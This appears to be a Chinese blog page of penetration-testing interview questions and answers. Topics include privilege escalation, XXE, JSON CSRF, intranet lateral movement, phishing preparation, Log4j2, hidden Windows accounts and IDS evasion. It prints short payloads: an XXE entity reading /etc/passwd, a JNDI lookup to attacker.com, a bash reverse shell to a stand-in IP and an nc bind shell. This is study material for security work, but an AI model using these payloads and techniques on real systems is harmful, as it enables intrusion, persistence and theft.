2025年滲透測試面試題總結-拷打題庫03(題目+回答)

網絡安全領域各種資源,學習文檔,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各種好玩的項目及好用的工具,歡迎關注。

目錄

2025年滲透測試面試題總結-拷打題庫03

一、Windows與Linux系統提權思路

Windows提權

Linux提權

二、Python框架及漏洞

主流框架與漏洞

三、小程序與普通滲透的差異

四、App漏洞測試要點

五、IDS/IPS防護與繞過

防護原理

繞過思路

六、JSON相關漏洞

JSON CSRF利用

JSON數據包測試點

七、XXE漏洞原理與利用

原理

利用方式

八、內網信息收集

九、內網橫向探測方法

十、外網打點流程

十一、FOFA使用技巧

十二、CDN識別方法

十三、郵件釣魚準備

十四、CMS識別的意義

十五、Apache Log4j2漏洞原理

十六、水坑攻擊與魚叉攻擊對比

十七、判斷操作系統類型

十八、3389端口無法連接的原因

十九、建立隱藏用戶(Windows)

二十、MySQL無法連接的原因

二十一、文件上傳監測點

二十二、常見未授權訪問漏洞

二十三、危險函數列表

二十四、正反向Shell對比

二十六、Web TOP 10漏洞(OWASP 2023)

二十七、SQL注入類型

二十八、中間件及漏洞

二十九、目錄掃描工具

2025年滲透測試面試題總結-拷打題庫03

談一談Windows系統與Linux系統提權的思路?
python有哪些框架,其中出現過哪些漏洞
小程序的滲透和普通滲透的差異
app本身的漏洞測試
IDS/IPS防護原理及繞過思路
json的csrf的利用
json格式的數據包可以測哪些漏洞
簡述xxe漏洞原理與利用方式
內網服務器,如何進行信息收集?
如果拿下了內網邊界層的某一個機器,如何對內網其他進行探測?
描述外網打點的流程?
舉幾個 FOFA 在外網打點過程中的使用小技巧?
如何識別CDN?
郵件釣魚的準備工作有哪些?
判斷出靶標的 CMS,對外網打點有什么意義?
Apache Log4j2 的漏洞原理是什么?
水坑攻擊和魚叉攻擊的區別是什么?
如何判斷靶標站點是 windows/linux?
無法連接服務器 3389 端口的幾種情況?
如何建立隱藏用戶?
為什么 Mysql 數據庫的站點,無法連接?
文件上傳功能的監測點有哪些?
常見的未授權訪問漏洞有哪些?
代碼執行、文件讀取、命令執行的函數有哪些?
正向 shell 和反向 shell 的區別是什么?
正向代理和反向代理的區別?
Web TOP 10 漏洞有哪些?
SQL 注入的種類有哪些?
常見的中間件有哪些?他們有那些漏洞?
常見的目錄掃描工具有哪些?

一、Windows與Linux系統提權思路

Windows提權
  1. 漏洞利用
    • 利用未修補的系統漏洞(如MS17-010永恒之藍、CVE-2020-0796 SMBGhost)。
    • 通過提權工具(如JuicyPotato、PrintSpoofer)濫用服務權限。
  2. 服務配置錯誤
    • 查找弱權限服務(sc query查看服務權限),通過修改可執行路徑或參數注入惡意代碼。
    • 利用AlwaysInstallElevated策略安裝惡意MSI包。
  3. 令牌竊取
    • 使用Mimikatz抓取內存中的管理員令牌或憑證(如Pass-the-Hash)。
  4. 計劃任務/啟動項
    • 劫持高權限計劃任務或注冊表啟動項(如schtasks)。
Linux提權
  1. 內核漏洞
    • 利用CVE-2016-5195(DirtyCow)、CVE-2021-4034(PwnKit)等漏洞直接獲取root權限。
  2. SUID/SGID濫用
    • 查找具有SUID權限的可執行文件(find / -perm -4000),利用配置不當程序(如findvim)執行命令。
  3. 環境變量劫持
    • 通過LD_PRELOAD注入惡意動態庫,或劫持PATH路徑中的程序。
  4. 定時任務(Cron)
    • 檢查全局可寫的Cron腳本或路徑劫持(如利用通配符*的tar命令)。

二、Python框架及漏洞

主流框架與漏洞
  1. Django
    • CVE-2021-35042(URL路徑遍歷)、CVE-2019-14234(SQL注入)。
  2. Flask
    • 服務器端模板注入(SSTI)漏洞(如{{ config.items() }}泄露敏感信息)。
  3. FastAPI
    • 依賴庫漏洞(如ujson反序列化問題)。
  4. Pickle反序列化
    • 使用pickle.loads 處理用戶輸入導致遠程代碼執行(RCE)。

三、小程序與普通滲透的差異

對比項小程序滲透普通Web滲透
入口點微信/支付寶客戶端、云函數接口傳統Web頁面、API接口
安全機制HTTPS強制、Token鑒權、數據加密依賴Cookie/Session、CORS策略
測試重點云函數未授權、本地存儲泄露、接口越權SQL注入、XSS、CSRF、文件上傳漏洞
逆向難度需反編譯小程序包(如wxapkg)直接分析前端代碼

四、App漏洞測試要點

  1. 本地存儲安全
    • 檢查SharedPreferences、SQLite數據庫明文存儲敏感數據。
  2. 組件暴露
    • Android的Activity/Service導出導致未授權訪問(如adb shell am start)。
  3. SSL Pinning繞過
    • 使用Frida或Xposed框架Hook證書驗證邏輯。
  4. API接口安全
    • 參數篡改(如修改用戶ID越權)、重放攻擊測試。

五、IDS/IPS防護與繞過

防護原理
  • 簽名檢測:匹配已知攻擊特征(如SQL關鍵字UNION SELECT)。
  • 行為分析:檢測異常流量(如高頻登錄嘗試)。
繞過思路
  1. 混淆技術
    • 對Payload進行編碼(如Hex/Unicode/Base64)、分片傳輸。
  2. 協議濫用
    • 利用HTTP/2多路復用、分塊傳輸編碼(Chunked)繞過內容檢測。
  3. 慢速攻擊
    • 降低請求速率(如每秒1次)繞過閾值觸發。

六、JSON相關漏洞

JSON CSRF利用
  • 條件:服務端未校驗Content-Type或依賴Cookie鑒權。
  • 構造Payload
    html<form action="http://target.com/api" method="POST" enctype="text/plain"> <input name='{"user":"attacker","csrf":"' value='test"}' type="hidden"> </form>
JSON數據包測試點
  1. XXE注入
    • 修改Content-Typeapplication/xml,插入惡意實體。
  2. JSONP劫持
    • 未校驗回調函數名(如callback=alert(1)//)。

七、XXE漏洞原理與利用

原理
  • XML解析器未禁用外部實體引用,導致文件讀取或SSRF。
利用方式
xml<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <data>&xxe;</data> 
  • 防御:禁用DTD、使用JSON替代XML。

八、內網信息收集

  1. 網絡拓撲探測
    • 使用arp-scannbtscan發現存活主機。
  2. 服務枚舉
    • Nmap掃描端口(SMB 445、WinRM 5985、SSH 22)。
  3. 憑證獲取
    • 提取內存密碼(Mimikatz)、歷史命令記錄(.bash_history)。

九、內網橫向探測方法

  1. 代理搭建
    • 使用EarthWorm/reGeorg建立Socks代理穿透內網。
  2. 橫向移動
    • Pass-the-Ticket攻擊Kerberos服務、WMI遠程執行命令。
  3. 權限維持
    • 創建隱藏計劃任務、SSH公鑰植入。

十、外網打點流程

  1. 資產發現
    • 使用FOFA搜索title="后臺管理"header="thinkphp"
  2. 漏洞驗證
    • 優先測試歷史漏洞(如Log4j2、Shiro反序列化)。
  3. 權限獲取
    • 上傳Webshell、利用RCE漏洞反彈Shell。

十一、FOFA使用技巧

  1. 精準搜索
    • title="登錄" && country="CN":定位中文登錄頁面。
    • icon_hash="-123456":通過網站圖標識別特定資產。
  2. 關聯分析
    • cert="*.example.com" :查找同一證書的關聯域名。

十二、CDN識別方法

  1. 多地Ping
    • 使用ping或在線工具(如ipip.net )檢測IP是否多地一致。
  2. DNS歷史記錄
    • 通過SecurityTrails查看歷史解析記錄。
  3. 子域名探測
    • 主站使用CDN,但未備案的子域名可能直連真實IP。

十三、郵件釣魚準備

  1. 目標畫像
    • 收集目標郵箱、職位、社交動態(如LinkedIn)。
  2. 郵件偽造
    • 使用Swaks工具偽造發件人(如CEO@company.com )。
  3. Payload設計
    • 制作免殺宏文檔(VBA代碼混淆)、釣魚鏈接短鏈跳轉。

十四、CMS識別的意義

  • 快速定位漏洞
    • 已知CMS(如WordPress、ThinkPHP)的公開漏洞可直接利用(如ThinkPHP 5.0 RCE)。
  • 縮小攻擊面
    • 針對性掃描默認路徑(如/wp-admin)、插件目錄。

十五、Apache Log4j2漏洞原理

  • 漏洞核心:JNDI注入,攻擊者通過${jndi:ldap://attacker.com/exp} 觸發遠程類加載。
  • 影響范圍:所有使用Log4j2 2.0-beta9至2.14.1版本的應用。

十六、水坑攻擊與魚叉攻擊對比

對比項水坑攻擊魚叉攻擊
目標特定群體(如企業員工)特定個人(如高管)
手段劫持目標常訪問的網站掛馬定向發送釣魚郵件/文件
技術難度需入侵高流量網站依賴社會工程學精準偽裝

十七、判斷操作系統類型

  1. HTTP頭特征
    • Windows服務器可能返回Server: Microsoft-IIS/10.0
  2. 文件路徑差異
    • URL中出現\(如/images\test.jpg )多為Windows。
  3. 報錯信息
    • Linux錯誤提示包含/var/log/路徑。

十八、3389端口無法連接的原因

  1. 網絡層問題
    • 防火墻攔截(入站規則未放行3389)。
  2. 服務配置
    • 遠程桌面服務未啟動(services.msc 檢查TermService)。
  3. 認證限制
    • 僅允許特定用戶組連接(如Administrators)。

十九、建立隱藏用戶(Windows)

  1. 注冊表操作
    • 創建用戶后修改注冊表HKLM\SAM\Domains\Account\Users,將用戶鍵值設為與管理員相同的F值。
  2. 命令行隱藏
    • 使用net user test$ /add創建帶$的用戶(部分工具不顯示)。

二十、MySQL無法連接的原因

  1. 權限限制
    • 用戶僅允許localhost訪問(檢查mysql.user 表)。
  2. 網絡配置
    • MySQL綁定IP為127.0.0.1,拒絕外部連接。
  3. 防火墻攔截
    • 云服務器安全組未放行3306端口。

二十一、文件上傳監測點

  1. 類型校驗
    • 繞過黑名單(如上傳.php5.phtml)。
  2. 內容檢測
    • 插入圖片馬繞過文件頭檢測(GIF89a)。
  3. 路徑控制
    • 利用目錄穿越(如filename="../../test.php" )。

二十二、常見未授權訪問漏洞

  1. Redis
    • 未設密碼,可直接寫入SSH公鑰或Webshell。
  2. MongoDB
    • 默認無需認證,導致數據泄露。
  3. Kubernetes API
    • 匿名訪問開啟,可創建惡意容器。

二十三、危險函數列表

漏洞類型函數示例
代碼執行eval()exec()popen()
文件讀取file_get_contents()fopen()
命令執行system()shell_exec()

二十四、正反向Shell對比

對比項正向Shell反向Shell
連接方向攻擊者主動連接目標目標主動連接攻擊者
適用場景目標出站受限(如防火墻嚴格)繞過目標入站限制
典型命令nc -lvp 4444 -e /bin/shbash -i >& /dev/tcp/1.1.1.1/4444 0>&1

?

二十六、Web TOP 10漏洞(OWASP 2023)

  1. 失效的訪問控制(Broken Access Control)
  2. 加密機制缺失(Cryptographic Failures)
  3. 注入漏洞(Injection)
  4. 不安全設計(Insecure Design)
  5. 安全配置錯誤(Security Misconfiguration)

二十七、SQL注入類型

  1. 聯合查詢注入UNION SELECT拼接數據。
  2. 盲注(Boolean/Time):通過條件判斷或延時差異提取數據。
  3. 報錯注入:利用數據庫報錯回顯信息(如updatexml())。

二十八、中間件及漏洞

  1. Apache
    • 解析漏洞(.php.xxx )、CVE-2021-41773(路徑遍歷)。
  2. Nginx
    • 目錄穿越(CVE-2017-7529)、配置錯誤導致目錄列表。
  3. Tomcat
    • 弱口令爆破后臺、CVE-2020-1938(Ghostcat文件讀取)。

二十九、目錄掃描工具

  1. DirBuster:支持多線程、自定義字典。
  2. 御劍:快速掃描常見后臺路徑(如/admin)。
  3. gobuster:基于Go語言,支持多種模式(dir、dns、vhost)。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/bicheng/77719.shtml
繁體地址,請注明出處:http://hk.pswp.cn/bicheng/77719.shtml
英文地址,請注明出處:http://en.pswp.cn/bicheng/77719.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

【華為】OSPF震蕩引起CPU占用率高怎么解決?

原創&#xff1a;廈門微思網絡 現象描述 如圖所示&#xff0c;Switch_1、Switch_2、Switch_3和Switch_4配置了OSPF協議&#xff0c;發現Switch_1設備的CPU占用率高&#xff0c;ROUT任務占用率明顯高于其他任務并且產生路由震蕩。 故障組網圖 原因分析 網絡中IP地址沖突導致…

Everything 安裝教程與使用教程(附安裝包)

文章目錄 前言一、Everything 介紹二、Everything 安裝教程1.Everything 安裝包下載2.選擇安裝文件3.選擇安裝語言4.接受許可協議5.選擇安裝位置6.配置安裝選項7.完成安裝 三、Everything 使用教程1.啟動軟件2.簡單關鍵詞搜索3.按類型搜索 前言 在日常使用電腦時&#xff0c;隨…

極狐GitLab CI/CD 流水線計算分鐘數如何管理?

極狐GitLab 是 GitLab 在中國的發行版&#xff0c;關于中文參考文檔和資料有&#xff1a; 極狐GitLab 中文文檔極狐GitLab 中文論壇極狐GitLab 官網 計算分鐘管理 (PREMIUM SELF) 在極狐GitLab 16.1 中&#xff0c;從 CI/CD 分鐘數重命名為計算配額或計算分鐘數。 管理員可…

Containerd 1.7.2 離線安裝與配置全指南(生產級優化)

Containerd 1.7.2 離線安裝與配置全指南&#xff08;生產級優化&#xff09; 摘要&#xff1a;本文詳細講解在無外網環境下部署 Containerd 1.7.2 容器運行時的完整流程&#xff0c;涵蓋二進制包安裝、私有鏡像倉庫配置、Systemd服務集成等關鍵步驟&#xff0c;并提供生產環境…

33-公交車司機管理系統

技術&#xff1a; 基于 B/S 架構 SpringBootMySQLvueelementui 環境&#xff1a; Idea mysql maven jdk1.8 node 用戶端功能 1.首頁:展示車輛信息及車輛位置和線路信息 2.模塊:車輛信息及車輛位置和線路信息 3.公告、論壇 4.在線留言 5.個人中心:修改個人信息 司機端功能…

基于 OpenCV 的圖像與視頻處理

基于 OpenCV 的圖像處理 一、實驗背景 OpenCV 是一個開源的計算機視覺庫&#xff0c;廣泛應用于圖像處理、視頻分析、目標檢測等領域。通過學習 OpenCV&#xff0c;可以快速實現圖像和視頻的處理功能&#xff0c;為復雜的應用開發 奠定基礎。本實驗旨在通過實際代碼示例&…

Linux 常用指令用戶手冊

Linux 常用指令用戶手冊 適合新手入門 & 日常速查 目錄 基礎操作文件與目錄管理權限與所有權文本處理壓縮與解壓系統監控網絡操作進程管理實用小技巧 1. 基礎操作 1.1 查看系統信息 # 查看內核版本 uname -a# 查看系統發行版信息&#xff08;適用于 Debian/Ubuntu&…

長效IP與短效IP:如何選擇適合業務的代理類型

在當今數據驅動的互聯網環境中&#xff0c;代理IP已成為企業運營、數據采集和網絡安全的關鍵工具。其中長效IP與短效IP作為兩種主流代理類型&#xff0c;因特性差異被應用于不同場景。本文將深入解析二者的區別&#xff0c;并提供實際場景中的選擇建議。 一、長效IP與短效IP&a…

數據結構|排序算法(三)選擇排序 堆排序 歸并排序

一、選擇排序 1.算法思想 選擇排序&#xff08;Selection Sort&#xff09;是一種簡單直觀的排序算法&#xff0c;其基本思想是&#xff1a;每次都從待排序部分中選出最小的一個數據和待排序的第一個數據交換。 將待排序序列分為已排序和未排序兩部分&#xff0c;初始時已排…

Vue3 + TypeScript,關于item[key]的報錯處理方法

處理方法1&#xff1a;// ts-ignore 注釋忽略報錯 處理方法2&#xff1a;item 設置為 any 類型

8.觀察者模式:思考與解讀

原文地址:觀察者模式&#xff1a;思考與解讀 更多內容請關注&#xff1a;7.深入思考與解讀設計模式 引言 在開發軟件時&#xff0c;系統的某些狀態可能會發生變化&#xff0c;而你希望這些變化能夠自動通知到依賴它們的其他模塊。你是否曾經遇到過&#xff0c;系統中某個對象…

【HD-RK3576-PI】Ubuntu桌面多顯、旋轉以及更新Logo

硬件&#xff1a;HD-RK3576-PI 軟件&#xff1a;Linux6.1Ubuntu22.04 在基于HD-RK3576-PI硬件平臺運行Ubuntu 22系統的開發過程中&#xff0c;屏幕方向調整是提升人機交互體驗的關鍵環節。然而&#xff0c;由于涉及uboot引導階段、內核啟動界面、桌面環境顯示全流程適配&#x…

Rsync+sersync2實現目錄實時同步

Sersync rsync 實現實時同步服務 sersync2二進制包目錄規劃 /app/tools/sersync/ /app/tools/sersync/bin /app/tools/sersync/conf項目架構是這樣的&#xff1a; ------------------- ------------------- ------------------- | | …

MySQL視圖高級應用與最佳實踐

1. 視圖與索引的協同優化?? ??物化視圖&#xff08;模擬實現&#xff09;?? MySQL原生不支持物化視圖&#xff0c;但可通過“定時刷新”的物理表模擬&#xff1a; -- 1. 創建存儲結果的物理表 CREATE TABLE cached_monthly_sales (product_id INT,total_sales DECIMAL(10…

string的模擬實現 (6)

目錄 1.string.h 2.string.cpp 3.test.cpp 4.一些注意點 本篇博客就學習下如何模擬實現簡易版的string類&#xff0c;學好string類后面學習其他容器也會更輕松些。 代碼實現如下&#xff1a; 1.string.h #define _CRT_SECURE_NO_WARNINGS 1 #pragma once #include <…

Unity:像素(Pixels) 和 單位(Units)

目錄 從第一性原理出發&#xff1a;什么是像素和 Unit&#xff1f; &#x1f9f1; 1. 像素&#xff08;Pixel&#xff09;&#xff1a;圖像的最小單位 &#x1f4d0; 2. Unity Unit&#xff08;單位&#xff09;&#xff1a;游戲世界中的度量單位 核心換算公式&#xff1a;…

【失敗總結】Win10系統安裝docker

1.啟用或關閉windows功能中&#xff0c;將Hyper-V功能勾選全部啟用&#xff0c;容器勾選。設置好后要重啟電腦。 2.管網下載下載安裝Docker  Docker官網&#xff1a;https://www.docker.com/ 3.可以自定義Docker安裝路徑 新建安裝目錄&#xff1a;d:\MySoftware\Docker并將D…

《Adaptive Layer-skipping in Pre-trained LLMs》- 論文筆記

作者&#xff1a;Xuan Luo, Weizhi Wang, Xifeng Yan Department of Computer Science, UC Santa Barbara xuan_luoucsb.edu, weizhiwangucsb.edu, xyancs.ucsb.edu 1. 引言與動機 1.1 背景 LLM 的成功與挑戰: 大型語言模型 (LLMs) 在翻譯、代碼生成、推理等任務上取得巨大成…

DQN在Gym的MountainCar環境的實現

DQN on MountainCar 引言 在本次實驗里&#xff0c;我構建了DQN和Dueling DQN&#xff0c;并在Gymnasium庫的MountainCar環境中對它們展開測試。我通過調整訓練任務的超參數&#xff0c;同時設計不同的獎勵函數及其對應參數&#xff0c;致力于獲取更優的訓練效果。最后&#…

計算機網絡綜合實驗指南

計算機網絡綜合實驗指南 本實驗將結合《計算機網絡自頂向下》前三章的核心概念&#xff0c;通過實際操作加深對應用層、運輸層和網絡層的理解。實驗涵蓋 HTTP/TCP抓包分析、DNS解析觀察、網頁性能評估及簡單Socket編程&#xff0c;幫助你將理論轉化為實踐。 實驗準備 工具&…